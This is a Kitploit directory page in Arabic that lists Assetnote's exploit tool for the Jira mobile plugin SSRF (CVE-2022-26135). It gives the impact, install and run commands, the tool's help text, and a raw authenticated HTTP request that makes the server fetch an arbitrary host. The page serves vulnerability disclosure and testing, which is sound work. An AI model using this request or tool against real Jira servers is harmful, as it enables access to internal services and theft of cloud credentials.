Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
jira-mobile-ssrf-exploit — كود استغلال لـ Jira Mobile Rest Plugin SSRF (CVE-2022-26135) | Kitploit
أدوات/GitHubGitHub/assetnote/jira-mobile-ssrf-exploit
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubassetnote/jira-mobile-ssrf-exploit

jira-mobile-ssrf-exploit

كود استغلال لـ Jira Mobile Rest Plugin SSRF (CVE-2022-26135)

عرض المستودع
8515منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-26135 - Full-Read Server Side Request Forgery في Mobile Plugin لـ Jira Data Center و Server

حول Assetnote

تقوم Assetnote تلقائيًا بتعيين أصولك الخارجية ومراقبتها بحثًا عن التغييرات والمشكلات الأمنية للمساعدة في منع الاختراقات الخطيرة.

تم إجراء هذا البحث بواسطة فريق أبحاث الأمن في Assetnote.

يمكنك قراءة المزيد عن منتجنا وفريقنا على https://assetnote.io.

منشور المدونة

يمكنك العثور على منشور المدونة الذي يوضح الخطوات المتبعة لاكتشاف هذه الثغرة هنا.

الوصف

Jira Core و Jira Service Desk معرضتان لـ server-side request forgery بعد المصادقة. في بعض الحالات، من الممكن الاستفادة من التسجيلات المفتوحة في Jira Core أو Jira Service Desk لاستغلال هذه الثغرة دون وجود بيانات اعتماد معروفة.

التأثير

تسمح ثغرة SSRF للمهاجمين بإرسال طلبات HTTP باستخدام أي طريقة HTTP ورؤوس وجسم إلى عناوين URL عشوائية. عندما يتم نشر Jira في بيئة سحابية، يمكن للمهاجم الاستفادة من سلسلة الاستغلال هذه للحصول على بيانات اعتماد السحابة أو معلومات حساسة أخرى من خلال عنوان IP للبيانات الوصفية.

البرامج المتأثرة

وفقًا للإرشاد الصادر من Atlassian، يُرجى مراجعة مقال قاعدة المعرفة التالي لتأكيد ما إذا كنت تستخدم إصدارًا برمجيًا متأثرًا: https://confluence.atlassian.com/jira/jira-server-security-advisory-29nd-june-2022-1142430667.html

تعليمات الاستخدام

root@kitploit:~
pip3 install -r requirements.txt

ثم يمكنك استخدام الأداة باستخدام:

root@kitploit:~
python3 exploit.py

المساعدة:

root@kitploit:~
usage: exploit.py [-h] --target TARGET --ssrf SSRF --mode MODE [--software SOFTWARE] [--username USERNAME] [--email EMAIL] [--password PASSWORD]

optional arguments:
  -h, --help           show this help message and exit
  --target TARGET      i.e. http://re.local:8090
  --ssrf SSRF          i.e. example.com (no protocol pls)
  --mode MODE          i.e. manual or automatic - manual mode you need to provide user auth info
  --software SOFTWARE  i.e. jira or jsd - only needed for manual mode
  --username USERNAME  i.e. admin - only needed for manual jira mode
  --email EMAIL        i.e. [email protected] - only needed for manual jira service desk mode
  --password PASSWORD  i.e. testing123 - only needed for manual mode

إذا كان لديك بالفعل بيانات اعتماد لـ Jira / Jira Service Desk، فاضبط --mode على manual والوسيطة --software إما على jira أو jsd.

طلب HTTP

يمكن استخدام طلب HTTP التالي لإعادة إنتاج هذه المشكلة، بعد المصادقة على مثيل Jira:

root@kitploit:~
POST /rest/nativemobile/1.0/batch HTTP/2
Host: issues.example.com
Cookie: JSESSIONID=44C6A24A15A1128CE78586A0FA1B1662; seraph.rememberme.cookie=818752%3Acc12c66e2f048b9d50eff8548800262587b3e9b1; atlassian.xsrf.token=AES2-GIY1-7JLS-HNZJ_db57d0893ec4d2e2f81c51c1a8984bde993b7445_lin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Origin: https://issues.example.com
Referer: https://issues.example.com/plugins/servlet/desk
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 63

{"requests":[{"method":"GET","location":"@example.com"}]}
تنزيل الأداة